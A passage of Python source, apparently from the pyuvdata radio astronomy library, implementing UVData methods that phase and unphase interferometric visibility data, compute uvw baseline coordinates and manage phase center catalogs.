If True, calculate the uvws directly from the antenna positions
rather than from the existing uvws. Default is True.
use_old_proj : bool
If True, uses the 'old' way of calculating baseline projections.
Default is False.
Raises
------
ValueError
If the phase_type is not 'phased'
"""
if self.phase_type == "phased":
pass
else:
raise ValueError(
"The data is already drift scanning; can only unphase phased data."
)
if not use_old_proj:
# Check to make sure that these attributes are actually filled. Otherwise,
# you probably want to use the old phase method.
if (not use_ant_pos) and (
self.phase_center_app_ra is None
or self.phase_center_app_dec is None
):
raise AttributeError(
"Object missing phase_center_ra_app or phase_center_dec_app, "
"which implies that the data were phased using the 'old' "
"method for phasing (which is not compatible with the new "
"version of the code). Please run unphase_to_drift with "
"use_old_proj=True to continue."
)
telescope_location = self.telescope_location_lat_lon_alt
# Check and see if we have any unphased objects, in which case
# their w-values should be zeroed out.
select_mask = ~self._check_for_unphased()
new_uvw = uvutils.calc_uvw(
lst_array=self.lst_array,
use_ant_pos=use_ant_pos,
uvw_array=self.uvw_array,
antenna_positions=self.antenna_positions,
antenna_numbers=self.antenna_numbers,
ant_1_array=self.ant_1_array,
ant_2_array=self.ant_2_array,
old_app_ra=self.phase_center_app_ra,
old_app_dec=self.phase_center_app_dec,
old_frame_pa=self.phase_center_frame_pa,
telescope_lat=telescope_location[0],
telescope_lon=telescope_location[1],
to_enu=True,
)
self._apply_w_proj(0.0, self.uvw_array[select_mask, 2], select_mask)
self.uvw_array = new_uvw
# remove/update phase center
if self.multi_phase_center:
self.phase_center_id_array[:] = self._add_phase_center(
"unphased", "unphased"
)
self.phase_center_app_ra = self.lst_array.copy()
self.phase_center_app_dec[:] = (
# apparent dec of zenith is the telescope latitude
np.zeros(self.Nblts) + telescope_location[0]
)
self.phase_center_frame_pa = np.zeros(self.Nblts)
else:
self.phase_center_frame = None
self.phase_center_ra = None
self.phase_center_dec = None
self.phase_center_epoch = None
self.phase_center_app_ra = None
self.phase_center_app_dec = None
self.phase_center_frame_pa = None
self._set_drift()
return
# If you are a multi phase center data set, there's no valid reason to be going
# back to the old phase method. Time to bail!
if self.multi_phase_center:
raise ValueError(
"Multi phase center data sets are not compatible with the old phasing "
"method, please set use_old_proj=False."
)
if phase_frame is None:
if self.phase_center_frame is not None:
phase_frame = self.phase_center_frame
else:
phase_frame = "icrs"
icrs_coord = SkyCoord(
ra=self.phase_center_ra,
dec=self.phase_center_dec,
unit="radian",
frame="icrs",
)
if phase_frame == "icrs":
frame_phase_center = icrs_coord
else:
# use center of observation for obstime for gcrs
center_time = np.mean([np.max(self.time_array), np.min(self.time_array)])
icrs_coord.obstime = Time(center_time, format="jd")
frame_phase_center = icrs_coord.transform_to("gcrs")
# This promotion is REQUIRED to get the right answer when we
# add in the telescope location for ICRS
# In some cases, the uvws are already float64, but sometimes they're not
self.uvw_array = np.float64(self.uvw_array)
# apply -w phasor
if not self.metadata_only:
w_lambda = (
self.uvw_array[:, 2].reshape(self.Nblts, 1)
/ const.c.to("m/s").value
* self.freq_array.reshape(1, self.Nfreqs)
)
if self.future_array_shapes:
phs = np.exp(-1j * 2 * np.pi * (-1) * w_lambda[:, :, None])
else:
phs = np.exp(-1j * 2 * np.pi * (-1) * w_lambda[:, None, :, None])
self.data_array *= phs
unique_times, unique_inds = np.unique(self.time_array, return_index=True)
telescope_location = EarthLocation.from_geocentric(
*self.telescope_location, unit=units.m
)
obs_times = Time(unique_times, format="jd")
itrs_telescope_locations = telescope_location.get_itrs(obstime=obs_times)
itrs_telescope_locations = SkyCoord(itrs_telescope_locations)
# just calling transform_to(coord.GCRS) will delete the obstime information
# need to re-add obstimes for a GCRS transformation
if phase_frame == "gcrs":
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())(obstime=obs_times)
)
else:
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())
)
frame_telescope_locations.representation_type = "cartesian"
for ind, jd in enumerate(unique_times):
inds = np.where(self.time_array == jd)[0]
obs_time = obs_times[ind]
if use_ant_pos:
ant_uvw = uvutils.phase_uvw(
self.telescope_location_lat_lon_alt[1],
self.telescope_location_lat_lon_alt[0],
self.antenna_positions,
)
# instead of looping through every ind, find the spot in antenna number
# array where ant_num <= ant1 < ant_number and similarly for ant2
# for all baselines in inds
# then find the uvw coordinate for all at the same time
# antenna_numbers does not necessarily need to be in order on the object
# but needs to be in order for the searchsorted to work.
# ant1_index and ant2_index arrays will preserve the order of blts
ant_sort = np.argsort(self.antenna_numbers)
ant1_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_1_array[inds]
)
ant2_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_2_array[inds]
)
self.uvw_array[inds] = (
ant_uvw[ant_sort][ant2_index, :] - ant_uvw[ant_sort][ant1_index, :]
)
else:
frame_telescope_location = frame_telescope_locations[ind]
itrs_lat_lon_alt = self.telescope_location_lat_lon_alt
uvws_use = self.uvw_array[inds, :]
uvw_rel_positions = uvutils.unphase_uvw(
frame_phase_center.ra.rad, frame_phase_center.dec.rad, uvws_use
)
frame_uvw_coord = SkyCoord(
x=uvw_rel_positions[:, 0] * units.m + frame_telescope_location.x,
y=uvw_rel_positions[:, 1] * units.m + frame_telescope_location.y,
z=uvw_rel_positions[:, 2] * units.m + frame_telescope_location.z,
frame=phase_frame,
obstime=obs_time,
representation_type="cartesian",
)
itrs_uvw_coord = frame_uvw_coord.transform_to("itrs")
# now convert them to ENU, which is the space uvws are in
self.uvw_array[inds, :] = uvutils.ENU_from_ECEF(
itrs_uvw_coord.cartesian.get_xyz().value.T, *itrs_lat_lon_alt
)
# remove phase center
self.phase_center_frame = None
self.phase_center_ra = None
self.phase_center_dec = None
self.phase_center_epoch = None
self._set_drift()
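# A minimal usage sketch (illustrative only; assumes `uvd` is a phased
# UVData object):
#
#     uvd.unphase_to_drift()                                       # new projection path
#     uvd.unphase_to_drift(use_old_proj=True, phase_frame="gcrs")  # legacy path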
def _phase_dict_helper(
self,
ra,
dec,
epoch,
phase_frame,
ephem_times,
cat_type,
pm_ra,
pm_dec,
dist,
vrad,
cat_name,
lookup_name,
select_mask,
time_array,
):
"""
Supplies a dictionary with parameters for the phase method to use.
This method should not be called directly by users; it is instead a function
called by the `phase` method, which packages up phase center information
into a single dictionary to allow for consistent behavior between different
instantiations of `UVData` objects.
"""
cat_id = None
info_source = "user"
if self.multi_phase_center:
name_list = list(self.phase_center_catalog.keys())
else:
name_list = [self.object_name]
# We only want to use the JPL-Horizons lookup service when working with a
# multi-phase-center instance of a UVData object.
if lookup_name and (cat_name not in name_list) and self.multi_phase_center:
if (cat_type is None) or (cat_type == "ephem"):
[
cat_times,
cat_lon,
cat_lat,
cat_dist,
cat_vrad,
] = uvutils.lookup_jplhorizons(
cat_name,
time_array,
telescope_loc=self.telescope_location_lat_lon_alt,
)
cat_type = "ephem"
cat_pm_ra = cat_pm_dec = None
cat_epoch = 2000.0
cat_frame = "icrs"
info_source = "jplh"
else:
raise ValueError(
"Unable to find %s in among the existing sources "
"recorded in the catalog. Please supply source "
"information (e.g., RA and Dec coordinates) and "
"set lookup_name=False." % cat_name
)
elif (cat_name in name_list) and self.multi_phase_center:
# If the name of the source matches, then verify that all of its
# properties are the same as what is stored in phase_center_catalog.
if lookup_name:
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
cat_diffs = 0
else:
cat_id, cat_diffs = self._look_in_catalog(
cat_name,
cat_type=cat_type,
cat_lon=ra,
cat_lat=dec,
cat_frame=phase_frame,
cat_epoch=epoch,
cat_times=ephem_times,
cat_pm_ra=pm_ra,
cat_pm_dec=pm_dec,
cat_dist=dist,
cat_vrad=vrad,
)
# If cat_diffs > 0, it means that the catalog entries don't match
if cat_diffs != 0:
# Last chance here -- if we have selected all of the data phased
# to this phase center, then we are still okay.
if select_mask is None:
# We have selected all data, so we're good
pass
elif np.all(
np.not_equal(
self.phase_center_id_array[~select_mask],
self.phase_center_catalog[cat_name]["cat_id"],
)
):
# We have selected a subset of the data that contains
# everything that was phased to the object
pass
else:
raise ValueError(
"The entry name %s is not unique, but arguments to phase "
"do not match that stored in phase_center_catalog. Try using a "
"different name, using select_mask to select all data "
"phased to this phase center, or using the existing phase "
"center information by setting lookup_name=True." % cat_name
)
cat_type = "sidereal" if cat_type is None else cat_type
cat_lon = ra
cat_lat = dec
cat_frame = phase_frame
cat_epoch = epoch
cat_times = ephem_times
cat_pm_ra = pm_ra
cat_pm_dec = pm_dec
cat_dist = dist
cat_vrad = vrad
else:
temp_dict = self.phase_center_catalog[cat_name]
cat_id = temp_dict["cat_id"]
cat_type = temp_dict["cat_type"]
info_source = temp_dict["info_source"]
# Get here will return None if no key found, which we want
cat_lon = temp_dict.get("cat_lon")
cat_lat = temp_dict.get("cat_lat")
cat_frame = temp_dict.get("cat_frame")
cat_epoch = temp_dict.get("cat_epoch")
cat_times = temp_dict.get("cat_times")
cat_pm_ra = temp_dict.get("cat_pm_ra")
cat_pm_dec = temp_dict.get("cat_pm_dec")
cat_dist = temp_dict.get("cat_dist")
cat_vrad = temp_dict.get("cat_vrad")
else:
# Either this is not a multi phase center data set, or the name of the
# source is unique!
cat_type = "sidereal" if cat_type is None else cat_type
cat_lon = ra
cat_lat = dec
cat_frame = phase_frame
cat_epoch = epoch
cat_times = ephem_times
cat_pm_ra = pm_ra
cat_pm_dec = pm_dec
cat_dist = dist
cat_vrad = vrad
if cat_epoch is None:
cat_epoch = 1950.0 if (cat_frame in ["fk4", "fk4noeterms"]) else 2000.0
if isinstance(cat_epoch, str) or isinstance(cat_epoch, Time):
cat_epoch = Time(cat_epoch).to_value(
"byear" if cat_frame in ["fk4", "fk4noeterms"] else "jyear"
)
# One last check - if we have an ephem phase center, let's make sure that the
# time range of the ephemeris encapsulates the entire range of time_array
check_ephem = False
if cat_type == "ephem":
# Take advantage of this to make sure that lat, lon, and times are all
# ndarray types
cat_lon = np.array(cat_lon, dtype=float)
cat_lat = np.array(cat_lat, dtype=float)
cat_times = np.array(cat_times, dtype=float)
cat_lon.shape += (1,) if (cat_lon.ndim == 0) else ()
cat_lat.shape += (1,) if (cat_lat.ndim == 0) else ()
cat_times.shape += (1,) if (cat_times.ndim == 0) else ()
check_ephem = np.min(time_array) < np.min(cat_times)
check_ephem = check_ephem or (np.max(time_array) > np.max(cat_times))
# If the ephem was supplied by JPL-Horizons, then we can easily expand
# it to cover the requested range.
if check_ephem and (info_source == "jplh"):
# Concat the two time ranges to make sure that we cover both the
# requested time range _and_ the original time range.
[
cat_times,
cat_lon,
cat_lat,
cat_dist,
cat_vrad,
] = uvutils.lookup_jplhorizons(
cat_name,
np.concatenate((np.reshape(time_array, -1), cat_times)),
telescope_loc=self.telescope_location_lat_lon_alt,
)
elif check_ephem:
# The ephem was user-supplied during the call to the phase method,
# raise an error to ask for more ephem data.
raise ValueError(
"Ephemeris data does not cover the entirety of the time range "
"attempted to be phased. Please supply additional ephem data "
"(and if used, set lookup_name=False)."
)
# Time to repackage everything into a dict
phase_dict = {
"cat_name": cat_name,
"cat_type": cat_type,
"cat_lon": cat_lon,
"cat_lat": cat_lat,
"cat_frame": cat_frame,
"cat_epoch": cat_epoch,
"cat_times": cat_times,
"cat_pm_ra": cat_pm_ra,
"cat_pm_dec": cat_pm_dec,
"cat_dist": cat_dist,
"cat_vrad": cat_vrad,
"info_source": info_source,
"cat_id": cat_id,
}
# Finally, make sure everything is a float or an ndarray of floats
for key in phase_dict.keys():
if isinstance(phase_dict[key], np.ndarray):
phase_dict[key] = phase_dict[key].astype(float)
elif (key == "cat_id") and (phase_dict[key] is not None):
# If this is the cat_id, make it an int
phase_dict[key] = int(phase_dict[key])
elif not ((phase_dict[key] is None) or isinstance(phase_dict[key], str)):
phase_dict[key] = float(phase_dict[key])
return phase_dict
def phase(
self,
ra,
dec,
epoch="J2000",
phase_frame="icrs",
cat_type=None,
ephem_times=None,
pm_ra=None,
pm_dec=None,
dist=None,
vrad=None,
cat_name=None,
lookup_name=False,
use_ant_pos=True,
allow_rephase=True,
orig_phase_frame=None,
select_mask=None,
cleanup_old_sources=True,
use_old_proj=False,
fix_old_proj=True,
):
"""
Phase a drift scan dataset to a single ra/dec at a particular epoch.
See the phasing memo under docs/references for more documentation.
Tested against MWA_Tools/CONV2UVFITS/convutils.
Parameters
----------
ra : float
The ra to phase to in radians.
dec : float
The dec to phase to in radians.
epoch : astropy.time.Time object or str
The epoch to use for phasing. Either an astropy Time object or the
string "J2000" (which is the default).
Note that the epoch is only used to evaluate the ra & dec values,
if the epoch is not J2000, the ra & dec values are interpreted
as FK5 ra/dec values and transformed to J2000, the data are then
phased to the J2000 ra/dec values.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & aberration.
cat_type : str
Type of phase center to be added. Must be one of:
"sidereal" (fixed RA/Dec), "ephem" (RA/Dec that moves with time),
"driftscan" (fixed az/el position). Default is "sidereal", other selections
are only permissible if `multi_phase_center=True`.
ephem_times : ndarray of float
Only used when `cat_type="ephem"`. Describes the time for which the values
of `cat_lon` and `cat_lat` are calculated, in units of JD. Shape is (Npts,).
pm_ra : float
Proper motion in RA, in units of mas/year. Only used for sidereal phase
centers.
pm_dec : float
Proper motion in Dec, in units of mas/year. Only used for sidereal phase
centers.
dist : float or ndarray of float
Distance of the source, in units of pc. Only used for sidereal and ephem
phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
vrad : float or ndarray of float
Radial velocity of the source, in units of km/s. Only used for sidereal and
ephem phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
cat_name : str
Name of the phase center being phased to. Required if
`multi_phase_center=True`, otherwise `object_name` is set to this value.
lookup_name : bool
Only used if `multi_phase_center=True`, allows the user to lookup phase
center information in `phase_center_catalog` (for the entry matching
`cat_name`). Setting this to `True` will ignore the values supplied to the
`ra`, `dec`, `epoch`, `phase_frame`, `pm_ra`, `pm_dec`, `dist`, `vrad`.
use_ant_pos : bool
If True, calculate the uvws directly from the antenna positions
rather than from the existing uvws.
allow_rephase : bool
If True, allow unphasing and rephasing if this object is already
phased.
orig_phase_frame : str
The original phase frame of this object (to use in unphasing). Only
used if the object is already phased, `allow_rephase` is True and
the phase_center_ra/dec of the object does not match `ra` and `dec`.
Defaults to using the 'phase_center_frame' attribute or 'icrs' if
that attribute is None.
select_mask : ndarray of bool
Optional mask for selecting which data to operate on along the blt-axis,
only used with multi phase center data sets (i.e.,
`multi_phase_center=True`). Shape is (Nblts,).
use_old_proj : bool
If True, use the "old" method for calculating baseline uvw-coordinates,
which involved using astropy to move antenna positions (in ITRF) into
the requested reference frame (either GCRS or ICRS). Default is False.
fix_old_proj : bool
If True, the method will convert a data set with coordinates calculated
using the "old" method, correct them, and then produce new coordinates
using the "new" method.
Raises
------
ValueError
If the phase_type is 'phased' and allow_rephase is False
"""
# Non-multi phase center datasets don't (yet) have a way of recording the
# 'extra' source properties or the selection mask, so make sure none of
# those are being used when looking at a single object.
if not self.multi_phase_center:
if select_mask is not None:
raise ValueError(
"Cannot apply a selection mask if multi_phase_center=False. "
"Remove the select_mask argument to continue."
)
check_params = [pm_ra, pm_dec, dist, vrad]
check_names = ["pm_ra", "pm_dec", "dist", "vrad"]
for name, value in zip(check_names, check_params):
if value not in [0, None]:
raise ValueError(
"Non-zero values of %s not supported when "
"multi_phase_center=False." % name
)
if (cat_type != "sidereal") and (cat_type is not None):
raise ValueError(
"Only sidereal sources are supported when multi_phase_center=False"
)
if lookup_name:
raise ValueError(
"Object name lookup is not supported when multi_phase_center=False"
)
else:
if cat_name is None:
raise ValueError(
"Must supply a unique name for cat_name when phasing a "
"multi phase center data set."
)
# If you are a multi phase center data set, there's no valid reason to be going
# back to the old phase method. Time to bail!
if self.multi_phase_center and use_old_proj:
raise NotImplementedError(
"Multi phase center data sets are not compatible with the old phasing "
"method, please set use_old_proj=False."
)
if not allow_rephase and (self.phase_type == "phased"):
raise ValueError(
"The data is already phased; set allow_rephase"
" to True to unphase and rephase."
)
# Right up front, split off the piece of the code that does the phasing
# using the "new" method, since it's a lot more flexible and everything
# outside of this block can eventually be deprecated.
if not use_old_proj:
needs_fix = (
(not use_ant_pos)
and (self.phase_type == "phased")
and (
self.phase_center_app_ra is None
or self.phase_center_app_dec is None
)
)
if needs_fix:
if fix_old_proj:
# To fix the 'old' projection, use the unphase_to_drift
# method with the 'old' projection to bring the data set back
# to ENU, and then proceed from there. None of this is
# necessary if the coordinates are calculated from antenna
# positions.
self.unphase_to_drift(
phase_frame=orig_phase_frame,
use_old_proj=True,
use_ant_pos=use_ant_pos,
)
else:
raise AttributeError(
"Data missing phase_center_ra_app or phase_center_dec_app, "
"which implies that the data were phased using the 'old' "
"method for phasing (which is not compatible with the new "
"version of the code). You can fix this by calling the "
"phase method with fix_old_proj=True, or can otherwise "
"proceed by using the 'old' projection method by setting "
"use_old_proj=True."
)
# Grab all the meta-data we need for the rotations
time_array = self.time_array
lst_array = self.lst_array
uvw_array = self.uvw_array
ant_1_array = self.ant_1_array
ant_2_array = self.ant_2_array
old_w_vals = self.uvw_array[:, 2].copy()
old_w_vals[self._check_for_unphased()] = 0.0
old_app_ra = self.phase_center_app_ra
old_app_dec = self.phase_center_app_dec
old_frame_pa = self.phase_center_frame_pa
# Check and see if we have any unphased objects, in which case
# their w-values should be zeroed out.
if select_mask is not None:
if len(select_mask) != self.Nblts:
raise IndexError("Selection mask must be of length Nblts.")
time_array = time_array[select_mask]
lst_array = lst_array[select_mask]
uvw_array = uvw_array[select_mask, :]
ant_1_array = ant_1_array[select_mask]
ant_2_array = ant_2_array[select_mask]
if isinstance(old_w_vals, np.ndarray):
old_w_vals = old_w_vals[select_mask]
# Before moving forward with the heavy calculations, we need to do some
# basic housekeeping to make sure that we've got the coordinate data that
# we need in order to proceed.
phase_dict = self._phase_dict_helper(
ra,
dec,
epoch,
phase_frame,
ephem_times,
cat_type,
pm_ra,
pm_dec,
dist,
vrad,
cat_name,
lookup_name,
select_mask,
time_array,
)
# We got the meta-data, now handle calculating the apparent coordinates.
# First, check if we need to look up the phase center in question
new_app_ra, new_app_dec = uvutils.calc_app_coords(
phase_dict["cat_lon"],
phase_dict["cat_lat"],
coord_frame=phase_dict["cat_frame"],
coord_epoch=phase_dict["cat_epoch"],
coord_times=phase_dict["cat_times"],
coord_type=phase_dict["cat_type"],
time_array=time_array,
lst_array=lst_array,
pm_ra=phase_dict["cat_pm_ra"],
pm_dec=phase_dict["cat_pm_dec"],
vrad=phase_dict["cat_vrad"],
dist=phase_dict["cat_dist"],
telescope_loc=self.telescope_location_lat_lon_alt,
)
# Now calculate position angles. If this is a single phase center data set,
# the ref frame is always equal to the source coordinate frame. In a multi
# phase center data set, those two components are allowed to be decoupled.
new_frame_pa = uvutils.calc_frame_pos_angle(
time_array,
new_app_ra,
new_app_dec,
self.telescope_location_lat_lon_alt,
self.phase_center_frame if self.multi_phase_center else phase_frame,
ref_epoch=self.phase_center_epoch if self.multi_phase_center else epoch,
)
# Now it's time to do some rotations and calculate the new coordinates
new_uvw = uvutils.calc_uvw(
app_ra=new_app_ra,
app_dec=new_app_dec,
frame_pa=new_frame_pa,
lst_array=lst_array,
use_ant_pos=use_ant_pos,
uvw_array=uvw_array,
antenna_positions=self.antenna_positions,
antenna_numbers=self.antenna_numbers,
ant_1_array=ant_1_array,
ant_2_array=ant_2_array,
old_app_ra=old_app_ra,
old_app_dec=old_app_dec,
old_frame_pa=old_frame_pa,
telescope_lat=self.telescope_location_lat_lon_alt[0],
telescope_lon=self.telescope_location_lat_lon_alt[1],
from_enu=(self.phase_type == "drift"),
)
# With all operations complete, we now start manipulating the UVData object
if self.multi_phase_center:
cat_id = self._add_phase_center(
phase_dict["cat_name"],
phase_dict["cat_type"],
cat_lon=phase_dict["cat_lon"],
cat_lat=phase_dict["cat_lat"],
cat_frame=phase_dict["cat_frame"],
cat_epoch=phase_dict["cat_epoch"],
cat_times=phase_dict["cat_times"],
cat_pm_ra=phase_dict["cat_pm_ra"],
cat_pm_dec=phase_dict["cat_pm_dec"],
cat_dist=phase_dict["cat_dist"],
cat_vrad=phase_dict["cat_vrad"],
info_source=phase_dict["info_source"],
cat_id=phase_dict["cat_id"],
force_update=True,
)
# Now it's time to update the raw data. This is a no-op if
# metadata_only is set to True. Note that cat_type is only allowed
# to be unphased if this is a multi_phase_center data set.
new_w_vals = 0.0 if (cat_type == "unphased") else new_uvw[:, 2]
self._apply_w_proj(new_w_vals, old_w_vals, select_mask=select_mask)
# Finally, we now take it upon ourselves to update some metadata. What we
# do here will depend a little bit on whether or not we have a selection
# mask active, since most everything is affected by that.
if select_mask is not None:
self.uvw_array[select_mask] = new_uvw
self.phase_center_app_ra[select_mask] = new_app_ra
self.phase_center_app_dec[select_mask] = new_app_dec
self.phase_center_frame_pa[select_mask] = new_frame_pa
if self.multi_phase_center:
self.phase_center_id_array[select_mask] = cat_id
else:
self.uvw_array = new_uvw
self.phase_center_app_ra = new_app_ra
self.phase_center_app_dec = new_app_dec
self.phase_center_frame_pa = new_frame_pa
if self.multi_phase_center:
self.phase_center_id_array[:] = cat_id
# If not multi phase center, make sure to update the ra/dec values, since
# otherwise we'll have no record of source properties.
if not self.multi_phase_center:
# Make sure this is actually marked as a phased dataset now
self._set_phased()
# Update the phase center properties
self.phase_center_ra = phase_dict["cat_lon"]
self.phase_center_dec = phase_dict["cat_lat"]
self.phase_center_epoch = phase_dict["cat_epoch"]
self.phase_center_frame = phase_dict["cat_frame"]
if cat_name is not None:
self.object_name = cat_name
else:
self.phase_center_ra = 0.0
self.phase_center_dec = 0.0
self.phase_center_epoch = 2000.0
if cleanup_old_sources:
self._clear_unused_phase_centers()
# All done w/ the new phase method
return
warnings.warn(
"The original `phase` method is deprecated, and will be removed in "
"pyuvdata v3.0 (although `fix_phase` will remain for longer). "
"Note that the old and new phase methods are NOT compatible with one "
"another, so if you have phased using the old method, you should call "
"the phase method with fix_old_proj=True, or otherwise can use the "
"unphase_to_drift method with use_old_proj=True to undo the old "
"corrections before using the new version of the phase method.",
DeprecationWarning,
)
if self.phase_type == "drift":
pass
elif self.phase_type == "phased":
# To get to this point, allow_rephase has to be true
if not np.isclose(
self.phase_center_ra,
ra,
rtol=self._phase_center_ra.tols[0],
atol=self._phase_center_ra.tols[1],
) or not np.isclose(
self.phase_center_dec,
dec,
rtol=self._phase_center_dec.tols[0],
atol=self._phase_center_dec.tols[1],
):
self.unphase_to_drift(
phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
use_old_proj=True,
)
else:
raise ValueError(
"The phasing type of the data is unknown. "
'Set the phase_type to "drift" or "phased" to '
"reflect the phasing status of the data"
)
if phase_frame not in ["icrs", "gcrs"]:
raise ValueError("phase_frame can only be set to icrs or gcrs.")
if epoch == "J2000" or epoch == 2000:
icrs_coord = SkyCoord(ra=ra, dec=dec, unit="radian", frame="icrs")
else:
assert isinstance(epoch, Time)
phase_center_coord = SkyCoord(
ra=ra, dec=dec, unit="radian", equinox=epoch, frame=FK5
)
# convert to icrs (i.e. J2000) to write to object
icrs_coord = phase_center_coord.transform_to("icrs")
self.phase_center_ra = icrs_coord.ra.radian
self.phase_center_dec = icrs_coord.dec.radian
self.phase_center_epoch = 2000.0
self.phase_center_app_ra = None
self.phase_center_app_dec = None
self.phase_center_frame_pa = None
if phase_frame == "icrs":
frame_phase_center = icrs_coord
else:
# use center of observation for obstime for gcrs
center_time = np.mean([np.max(self.time_array), np.min(self.time_array)])
icrs_coord.obstime = Time(center_time, format="jd")
frame_phase_center = icrs_coord.transform_to("gcrs")
# This promotion is REQUIRED to get the right answer when we
# add in the telescope location for ICRS
self.uvw_array = np.float64(self.uvw_array)
unique_times, unique_inds = np.unique(self.time_array, return_index=True)
telescope_location = EarthLocation.from_geocentric(
*self.telescope_location, unit=units.m
)
obs_times = Time(unique_times, format="jd")
itrs_telescope_locations = telescope_location.get_itrs(obstime=obs_times)
itrs_telescope_locations = SkyCoord(itrs_telescope_locations)
# just calling transform_to(coord.GCRS) would drop the obstime information,
# so we need to re-attach the obstimes for a GCRS transformation
if phase_frame == "gcrs":
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())(obstime=obs_times)
)
else:
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())
)
# set the representation_type to cartesian to get xyz later
frame_telescope_locations.representation_type = "cartesian"
for ind, jd in enumerate(unique_times):
inds = np.where(self.time_array == jd)[0]
obs_time = obs_times[ind]
itrs_lat_lon_alt = self.telescope_location_lat_lon_alt
frame_telescope_location = frame_telescope_locations[ind]
if use_ant_pos:
# This promotion is REQUIRED to get the right answer when we
# add in the telescope location for ICRS
ecef_ant_pos = (
np.float64(self.antenna_positions) + self.telescope_location
)
itrs_ant_coord = SkyCoord(
x=ecef_ant_pos[:, 0] * units.m,
y=ecef_ant_pos[:, 1] * units.m,
z=ecef_ant_pos[:, 2] * units.m,
frame="itrs",
obstime=obs_time,
)
frame_ant_coord = itrs_ant_coord.transform_to(phase_frame)
frame_ant_rel = (
(frame_ant_coord.cartesian - frame_telescope_location.cartesian)
.get_xyz()
.T.value
)
frame_ant_uvw = uvutils.phase_uvw(
frame_phase_center.ra.rad, frame_phase_center.dec.rad, frame_ant_rel
)
# Instead of looping through every ind, use searchsorted to find where each
# ant_1 and ant_2 value falls in the sorted antenna number array for all
# baselines in inds, then look up the uvw coordinates for all of them at once.
# antenna_numbers does not necessarily need to be in order on the object,
# but it does need to be in order for the searchsorted to work.
# The ant1_index and ant2_index arrays preserve the order of the blts.
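# As a hedged illustration (values are made up): if antenna_numbers were
# [11, 3, 7], then ant_sort = [1, 2, 0] and the sorted numbers are [3, 7, 11].
# np.searchsorted([3, 7, 11], [7, 11, 3]) returns [1, 2, 0], so indexing
# frame_ant_uvw[ant_sort] with ant1_index/ant2_index picks out, for every
# baseline at once, the row belonging to each antenna.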
ant_sort = np.argsort(self.antenna_numbers)
ant1_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_1_array[inds]
)
ant2_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_2_array[inds]
)
self.uvw_array[inds] = (
frame_ant_uvw[ant_sort][ant2_index, :]
- frame_ant_uvw[ant_sort][ant1_index, :]
)
else:
# Also, uvws should be thought of as ENU-like, not ECEF (or rotated ECEF);
# convert them to ECEF to transform between frames
uvws_use = self.uvw_array[inds, :]
uvw_ecef = uvutils.ECEF_from_ENU(uvws_use, *itrs_lat_lon_alt)
itrs_uvw_coord = SkyCoord(
x=uvw_ecef[:, 0] * units.m,
y=uvw_ecef[:, 1] * units.m,
z=uvw_ecef[:, 2] * units.m,
frame="itrs",
obstime=obs_time,
)
frame_uvw_coord = itrs_uvw_coord.transform_to(phase_frame)
# this takes out the telescope location in the new frame,
# so these are vectors again
frame_rel_uvw = (
frame_uvw_coord.cartesian.get_xyz().value.T
- frame_telescope_location.cartesian.get_xyz().value
)
self.uvw_array[inds, :] = uvutils.phase_uvw(
frame_phase_center.ra.rad, frame_phase_center.dec.rad, frame_rel_uvw
)
# calculate data and apply phasor
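# In other words, each visibility gets multiplied by the geometric phase
# factor exp(-2*pi*i * w * nu / c), where w is the updated w coordinate in
# meters and nu is the channel frequency in Hz; w_lambda below is simply w
# expressed in wavelengths for every baseline-time and channel.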
if not self.metadata_only:
w_lambda = (
self.uvw_array[:, 2].reshape(self.Nblts, 1)
/ const.c.to("m/s").value
* self.freq_array.reshape(1, self.Nfreqs)
)
if self.future_array_shapes:
phs = np.exp(-1j * 2 * np.pi * w_lambda[:, :, None])
else:
phs = np.exp(-1j * 2 * np.pi * w_lambda[:, None, :, None])
self.data_array *= phs
self.phase_center_frame = phase_frame
self._set_phased()
def phase_to_time(
self,
time,
phase_frame="icrs",
use_ant_pos=True,
use_old_proj=False,
allow_rephase=True,
orig_phase_frame=None,
select_mask=None,
):
"""
Phase a drift scan dataset to the ra/dec of zenith at a particular time.
See the phasing memo under docs/references for more documentation.
Parameters
----------
time : astropy.time.Time object or float
The time to phase to, an astropy Time object or a float Julian Date
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & aberration.
use_ant_pos : bool
If True, calculate the uvws directly from the antenna positions
rather than from the existing uvws.
allow_rephase : bool
If True, allow unphasing and rephasing if this object is already
phased.
orig_phase_frame : str
The original phase frame of this object (to use in unphasing). Only
used if the object is already phased, `allow_rephase` is True and
the phase_center_ra/dec of the object does not match the zenith ra/dec
computed from `time`.
Defaults to using the 'phase_center_frame' attribute or 'icrs' if
that attribute is None.
select_mask : array_like
Selection mask for which data should be rephased, only applicable if
`multi_phase_center=True`. Any array-like able to be used as an index
is suitable -- the most typical is an array of bool with length `Nblts`,
or an array of ints within the range (-Nblts, Nblts).
Raises
------
ValueError
If the phase_type is not 'drift'
TypeError
If time is not an astropy.time.Time object or Julian Date as a float
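Examples
--------
A minimal usage sketch (assumes `uvd` is a drift-scan UVData object already
in memory; the variable name and Julian Date are illustrative)::

    from astropy.time import Time

    # phase to the zenith at the given time (a float Julian Date also works)
    uvd.phase_to_time(Time(2458838.5, format="jd"))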
"""
if isinstance(time, (float, np.floating)):
time = Time(time, format="jd")
if not isinstance(time, Time):
raise TypeError("time must be an astropy.time.Time object or a float")
# Generate ra/dec of zenith at time in the phase_frame coordinate
# system to use for phasing
telescope_location = EarthLocation.from_geocentric(
*self.telescope_location, unit="m"
)
zenith_coord = SkyCoord(
alt=Angle(90 * units.deg),
az=Angle(0 * units.deg),
obstime=time,
